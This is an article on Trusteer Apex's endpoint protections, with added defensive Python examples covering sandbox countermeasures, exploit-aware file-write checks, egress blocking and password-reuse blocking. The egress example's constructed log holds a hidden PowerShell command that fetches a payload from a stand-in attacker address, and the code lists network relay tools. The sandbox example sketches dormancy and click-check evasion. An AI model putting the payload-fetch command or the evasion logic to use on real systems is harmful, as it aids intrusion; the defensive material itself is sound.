Most malware and advanced persistent threats enter the enterprise through vulnerable endpoints. A new product from Trusteer aims to keep exploits and malware from compromising those endpoints and extracting information.
Malware developers are getting more creative. They've learned how common tools are designed to combat them and they simply develop new ways to evade these tools. It's a constant game of cat and mouse.
For example, sandboxing is a common technique: suspect code is run in an isolated, instrumented environment for a period of time to see what actions it takes. If no bad actions are observed within that window -- say 10 to 20 minutes -- the code is assumed benign and allowed to run on the real endpoint. Malware developers sidestep this by having their code sit dormant for days or even weeks before activating and wreaking havoc. Or the code may activate only after a mouse click; since an automated sandbox generates no user interaction, the code does nothing until it reaches a real user's machine.
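The two evasions above, and the two countermeasures a sandbox can apply to them, as an added example that is not from the article or from any vendor's product. The sample, the sandbox environment, the budget and the dormancy period are all constructed; the sample performs no real I/O. A virtual clock that fast-forwards every sleep defeats the delay, and fabricated mouse activity defeats the click check; the verdicts show that the naive sandbox and the clock-only sandbox both call the sample benign.

```python
from dataclasses import dataclass, field
from typing import Callable, List

SANDBOX_BUDGET_S = 20 * 60       # the 10-20 minute analysis window described above
DORMANCY_S = 3 * 24 * 3600       # constructed: the sample waits three days before acting
BAD_ACTIONS = {"download_stage2", "exfiltrate_documents"}


class BudgetExhausted(Exception):
    """Raised when the sample has consumed the sandbox's wall-clock budget."""


@dataclass
class SandboxEnv:
    """What the sample can observe. fast_forward makes every sleep return at once
    while still advancing the clock the sample reads; synthetic_input makes the
    sandbox report mouse activity it fabricates. Both default to off, which is
    the naive sandbox described above."""
    fast_forward: bool = False
    synthetic_input: bool = False
    clock_s: float = 0.0          # virtual seconds since the sample started
    wall_spent_s: float = 0.0     # real analysis time consumed
    clicks: int = 0
    trace: List[str] = field(default_factory=list)

    def sleep(self, seconds: float) -> None:
        self.clock_s += seconds
        if not self.fast_forward:
            self.wall_spent_s += seconds
            if self.wall_spent_s > SANDBOX_BUDGET_S:
                raise BudgetExhausted()

    def uptime(self) -> float:
        return self.clock_s

    def mouse_clicks(self) -> int:
        if self.synthetic_input:
            self.clicks += 1      # pretend a user clicked since the last poll
        return self.clicks

    def act(self, what: str) -> None:
        self.trace.append(what)


def evasive_sample(env: SandboxEnv) -> None:
    """Stand-in for the malware: stays dormant for days, then acts only after
    it has seen a mouse click."""
    while env.uptime() < DORMANCY_S:
        env.sleep(600)
    if env.mouse_clicks() == 0:
        return                     # no user present: probably a sandbox, stay quiet
    env.act("download_stage2")
    env.act("exfiltrate_documents")


def analyze(sample: Callable[[SandboxEnv], None],
            fast_forward: bool = False, synthetic_input: bool = False) -> str:
    """Detonate the sample under the chosen countermeasures and return a verdict."""
    env = SandboxEnv(fast_forward=fast_forward, synthetic_input=synthetic_input)
    try:
        sample(env)
    except BudgetExhausted:
        pass                       # analysis window ended with nothing observed
    return "malicious" if BAD_ACTIONS & set(env.trace) else "benign"


if __name__ == "__main__":
    print("naive sandbox:        ", analyze(evasive_sample))
    print("fast-forward only:    ", analyze(evasive_sample, fast_forward=True))
    print("fast-forward + clicks:", analyze(evasive_sample, fast_forward=True, synthetic_input=True))
```

Note that each countermeasure alone is insufficient: fast-forwarding the clock gets the sample past its dormancy, but it still refuses to act until it sees the click the sandbox never sends. Real sandboxes apply both, and samples in turn look for the artifacts of those tricks, which is the cat-and-mouse game the article describes.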
By today's security standards, trying to detect malware by file signatures or blacklisting seems quaint. Worse, it is nearly useless against anything not already catalogued. Antivirus and anti-malware vendors have tried to keep pace with the cybercriminals by adding heuristics to their products, but heuristics still miss new zero-day malicious code and advanced persistent threats (APTs).
Security vendors have started to take radically new approaches to combating malware and APTs. They are making use of vast amounts of behavior data they collect from their own or other suppliers' intelligence feeds. Being able to observe software behavior and traits on millions of Internet-connected computers allows security vendors to develop profiles of good behavior and bad behavior. From this they can craft new solutions that prevent or shut down the bad behavior and allow only the good software to proceed.
Trusteer is one such vendor. It is applying the intelligence gathered from managing more than 30 million endpoints toward new techniques for protecting enterprise endpoints. Trusteer has been known for many years in financial services: its Rapport product is used by numerous banks and credit unions to prevent online banking fraud by protecting consumers' computers from takeover by malware. Now Trusteer has introduced Apex for the enterprise.
Trusteer Apex is an automated product that prevents exploits and keeps malware from compromising endpoints and extracting information. Since APTs and targeted attacks today typically begin by compromising a user endpoint, stopping the compromise there cuts the attack off at its first step.
Apex delivers three layers of security: exploit prevention, data exfiltration prevention and credentials protection. Here's a quick look at how each layer works.
The exploit prevention layer is based on what Trusteer calls stateful application control. While monitoring and protecting its 30 million consumer endpoints over the years, Trusteer learned to observe precisely what goes on when an application writes a downloaded file to an endpoint's file system. By examining the application's memory state and the runtime properties of the endpoint at that moment, Apex can determine why the file was downloaded.
Consider what happens when a browser downloads a file from the Internet. It could be a legitimate download, such as a user intentionally updating Adobe Reader, or a malicious drive-by download the user never requested. Browser activity alone makes the two hard to tell apart, but the memory state and runtime properties of the machine at the moment of the download do distinguish them. Apex applies this to applications that are frequently exploited, such as browsers, Adobe Reader and Java: it looks for an abnormal application state at the time a file is written, and when it sees one, the file is quarantined and prevented from executing.
The advantage of this approach is that it does not matter where the attack comes from, what kind of malware is being downloaded, or which vulnerability is being exploited; the malware can be known or unknown. Because the download violates the application's normal operation, it is stopped. This lets the approach catch zero-day exploits, exploitation of known application vulnerabilities, and silent downloads of malware to the endpoint in general. The flip side is that the protection is only as good as the vendor's model of normal application behavior, so the coverage of that model is what a buyer should ask about.
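A simplified model of the decision described in the two paragraphs above, added here as an example; it is not Trusteer's implementation, and the state fields, module names, policy table and events are all constructed assumptions. Each file write is judged together with a snapshot of the writing application: whether code is executing from writable memory, whether the write was issued by a module that belongs to the application, and whether a user action preceded it.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".msi", ".jar")

# Per-application policy (illustrative names): which module may legitimately
# write a downloaded file, and how recent a user action must be for the write
# to count as user-initiated.
POLICY = {
    "chrome.exe":   {"download_modules": {"chrome.dll"},   "user_action_window_s": 120.0},
    "AcroRd32.exe": {"download_modules": {"AcroRd32.dll"}, "user_action_window_s": 120.0},
    "java.exe":     {"download_modules": {"jvm.dll"},      "user_action_window_s": 120.0},
}


@dataclass
class AppState:
    """Snapshot of the application at the moment of the file write (assumed fields)."""
    process: str
    last_user_action_ts: Optional[float]   # last click / Save dialog, None if never
    code_in_writable_memory: bool          # execution seen from stack or heap
    unbacked_modules: Set[str] = field(default_factory=set)  # code with no file on disk


@dataclass
class FileWrite:
    process: str
    path: str
    writer_module: str    # module on top of the call stack that issued the write
    ts: float


def classify(state: AppState, write: FileWrite) -> Tuple[str, str]:
    """Return ("allow" | "quarantine", reason) for one file write."""
    policy = POLICY.get(state.process)
    if policy is None:
        return "allow", "application not under stateful control"
    if state.code_in_writable_memory:
        return "quarantine", "code running from writable memory: exploit payload in control"
    if write.writer_module in state.unbacked_modules:
        return "quarantine", f"write issued by unbacked code {write.writer_module}"
    if write.writer_module not in policy["download_modules"]:
        return "quarantine", f"write issued by unexpected module {write.writer_module}"
    user_initiated = (
        state.last_user_action_ts is not None
        and 0.0 <= write.ts - state.last_user_action_ts <= policy["user_action_window_s"]
    )
    if write.path.lower().endswith(EXECUTABLE_SUFFIXES) and not user_initiated:
        return "quarantine", "executable written without a preceding user action (silent download)"
    return "allow", "write consistent with a user-initiated download"


# Constructed events: a legitimate Reader update, a drive-by exploit in the
# browser, a silent Java download and an ordinary Reader cache write.
SAMPLE_EVENTS = [
    (AppState("chrome.exe", last_user_action_ts=1000.0, code_in_writable_memory=False),
     FileWrite("chrome.exe", r"C:\Users\u\Downloads\AcroRdrDC.exe", "chrome.dll", 1015.0)),
    (AppState("chrome.exe", last_user_action_ts=None, code_in_writable_memory=True,
              unbacked_modules={"0x1a2b0000"}),
     FileWrite("chrome.exe", r"C:\Users\u\AppData\Local\Temp\svc.exe", "0x1a2b0000", 2000.0)),
    (AppState("java.exe", last_user_action_ts=None, code_in_writable_memory=False),
     FileWrite("java.exe", r"C:\Users\u\AppData\Local\Temp\loader.jar", "jvm.dll", 3000.0)),
    (AppState("AcroRd32.exe", last_user_action_ts=None, code_in_writable_memory=False),
     FileWrite("AcroRd32.exe", r"C:\Users\u\AppData\Local\Temp\form.pdf", "AcroRd32.dll", 4000.0)),
]


def triage(events) -> List[str]:
    """Decision for each (state, write) pair, in order."""
    return [classify(state, write)[0] for state, write in events]


if __name__ == "__main__":
    for state, write in SAMPLE_EVENTS:
        print(write.process, write.path.rsplit("\\", 1)[-1], "->", *classify(state, write))
```

The checks are ordered from strongest evidence to weakest: code executing from the heap or from an unbacked region is an exploit regardless of what file is written, while the user-action window only matters for files that can run. The last event shows why the model must look at state rather than at writes alone: Reader writing a cached PDF with no user action is normal and is allowed.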
But exploits and silent downloads are not the only ways malware gets onto a PC. An infected thumb drive can deliver it, or malicious code can be embedded in an otherwise legitimate application. The second layer of Apex protection, data exfiltration prevention, therefore blocks unauthorized external communication. The first thing advanced malware does after infecting an endpoint is register with its command-and-control server to get instructions; eventually it steals information and sends it out to the attacker. That external communication is essential to the attack.
Trusteer says Apex recognizes the direct and indirect forms of external communication used by malicious processes and blocks them. Malware that cannot phone home for instructions cannot send data out of the network to the attacker either.
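A process-level egress policy illustrating the direct and indirect cases just described, added here as an example; it is not Trusteer's code, and the record format, the trusted-process lists and the connection log are constructed. "Direct" is an untrusted process opening its own socket; "indirect" is untrusted code borrowing a trusted process, either by injecting into it or by launching a built-in tool to do the talking.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Processes allowed to open outbound connections on their own behalf (illustrative).
TRUSTED_NETWORK_PROCESSES = {"chrome.exe", "outlook.exe", "svchost.exe"}
# Built-in tools that untrusted code commonly borrows to reach the network.
RELAY_TOOLS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "curl.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}   # a user starting a tool from the desktop


@dataclass
class Connection:
    """One outbound connection attempt as an endpoint agent might record it."""
    ts: float
    process: str
    parent: str
    dst: str
    port: int
    origin_in_mapped_image: bool   # connect() called from code mapped from the process's own files
    cmdline: str = ""


def decide(conn: Connection) -> Tuple[str, str]:
    """Return ("allow" | "block", reason) for one connection attempt."""
    if conn.process in RELAY_TOOLS:
        if conn.parent in TRUSTED_NETWORK_PROCESSES | INTERACTIVE_PARENTS:
            return "allow", f"{conn.process} started by a trusted parent"
        return "block", f"indirect: {conn.process} started by untrusted {conn.parent}"
    if conn.process not in TRUSTED_NETWORK_PROCESSES:
        return "block", f"direct: {conn.process} may not talk externally"
    if not conn.origin_in_mapped_image:
        return "block", f"indirect: unbacked (injected) code in {conn.process} opened the socket"
    return "allow", "trusted process, own code"


# Constructed log: a browser update, a USB-delivered binary registering with its
# C2 server, an injected thread in svchost, PowerShell spawned by the binary,
# normal mail traffic, and the binary's exfiltration attempt an hour later.
SAMPLE_LOG = [
    Connection(100.0, "chrome.exe", "explorer.exe", "update.adobe.com", 443, True),
    Connection(160.0, "winhlp_svc.exe", "explorer.exe", "203.0.113.7", 8443, True),
    Connection(161.0, "svchost.exe", "services.exe", "203.0.113.7", 443, False),
    Connection(162.0, "powershell.exe", "winhlp_svc.exe", "203.0.113.7", 80, True,
               "-w hidden -c Invoke-WebRequest http://203.0.113.7/s"),
    Connection(200.0, "outlook.exe", "explorer.exe", "mail.corp.example", 443, True),
    Connection(3800.0, "winhlp_svc.exe", "explorer.exe", "203.0.113.7", 8443, True),
]


def enforce(log: List[Connection]) -> List[str]:
    """Decision for each connection, in log order."""
    return [decide(c)[0] for c in log]


if __name__ == "__main__":
    for conn in SAMPLE_LOG:
        verdict, why = decide(conn)
        print(f"{conn.ts:7.0f} {conn.process:16} -> {conn.dst}:{conn.port:<5} {verdict:5} {why}")
```

The policy never inspects the destination, which is the point the article makes: it does not need to know the attacker's server, only that the code asking to talk is not code that is allowed to. The cost, as with any allowlist, is maintaining the list of processes that legitimately need the network.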
The third layer of protection Trusteer Apex provides is credentials protection. Organizations worry about legitimate enterprise credentials being harvested in phishing attacks or reused on public websites such as Facebook, LinkedIn and eBay. Apex includes an anti-keylogger that encrypts keystrokes as passwords are typed, so that anything a keylogger captures is useless, and it prevents users from reusing enterprise passwords on non-enterprise websites. Apex keeps a list of approved enterprise applications where corporate credentials may be used; if the user goes to, say, Facebook and tries to log in with the same credentials, the attempt is blocked.
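One way to implement the reuse check described above, added as an example that is not Trusteer's code. It assumes an allowlist of enterprise domains and a per-device secret, and it stores only a keyed fingerprint of each enterprise password, never the password. The match is made on the password alone, because the username on a public site will usually differ from the corporate one.

```python
import hashlib
import hmac
import secrets
from typing import Dict, List, Tuple

# Domains where corporate credentials may be entered (illustrative).
ENTERPRISE_DOMAINS = {"corp.example"}


def is_enterprise_host(host: str) -> bool:
    """Exact or subdomain match against the allowlist; port and trailing dot ignored."""
    host = host.lower().split(":", 1)[0].rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ENTERPRISE_DOMAINS)


class CredentialGuard:
    """Keeps a keyed fingerprint of each enrolled enterprise password and refuses
    its submission to any non-enterprise host."""

    def __init__(self, device_key: bytes):
        # Per-device secret kept outside any web page. Someone who steals both
        # the key and the fingerprints can still brute-force weak passwords,
        # so the store deserves the same protection as a password manager's.
        self._key = device_key
        self._fingerprints: Dict[str, bytes] = {}   # username -> HMAC(password)

    def _fingerprint(self, password: str) -> bytes:
        return hmac.new(self._key, password.encode("utf-8"), hashlib.sha256).digest()

    def enroll(self, host: str, username: str, password: str) -> None:
        """Record a password at the moment an enterprise application accepts it."""
        if not is_enterprise_host(host):
            raise ValueError("only enterprise logins are enrolled")
        self._fingerprints[username] = self._fingerprint(password)

    def check_submission(self, host: str, username: str, password: str) -> Tuple[str, str]:
        """Decide before the form leaves the browser: ("allow" | "block", reason)."""
        if is_enterprise_host(host):
            return "allow", "enterprise application"
        fp = self._fingerprint(password)
        for user, stored in self._fingerprints.items():
            if hmac.compare_digest(fp, stored):
                return "block", f"password of enterprise account {user!r} reused on {host}"
        return "allow", "no enterprise password detected"


def demo() -> List[str]:
    """Enroll one corporate login, then try three submissions (constructed data)."""
    guard = CredentialGuard(secrets.token_bytes(32))
    guard.enroll("sso.corp.example", "jdoe", "correct horse battery staple")
    cases = [
        ("sso.corp.example", "jdoe", "correct horse battery staple"),
        ("www.facebook.com", "jdoe@mail.example", "correct horse battery staple"),
        ("www.facebook.com", "jdoe@mail.example", "something else entirely"),
    ]
    return [guard.check_submission(h, u, p)[0] for h, u, p in cases]


if __name__ == "__main__":
    print(demo())
```

The host check deliberately requires an exact domain or a subdomain of it, so a phishing host such as corp.example.attacker.test is not treated as enterprise; that is exactly the case where a reused password must be blocked.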
Trusteer Apex is available today for Windows PCs, with a Mac version coming soon; mobile devices are on Trusteer's roadmap. Apex can be deployed on managed or unmanaged endpoints that access enterprise resources or web applications, so that no compromised endpoint puts the enterprise at risk.
Linda Musthaler is a principal analyst with Essential Solutions Corporation. You can write to her at LMusthaler@essential-iws.com.
About Essential Solutions Corp:
Essential Solutions researches the practical value of information technology, and how it can make individual workers and entire organizations more productive. Essential Solutions offers consulting services to computer industry and corporate clients to help define and fulfill the potential of IT.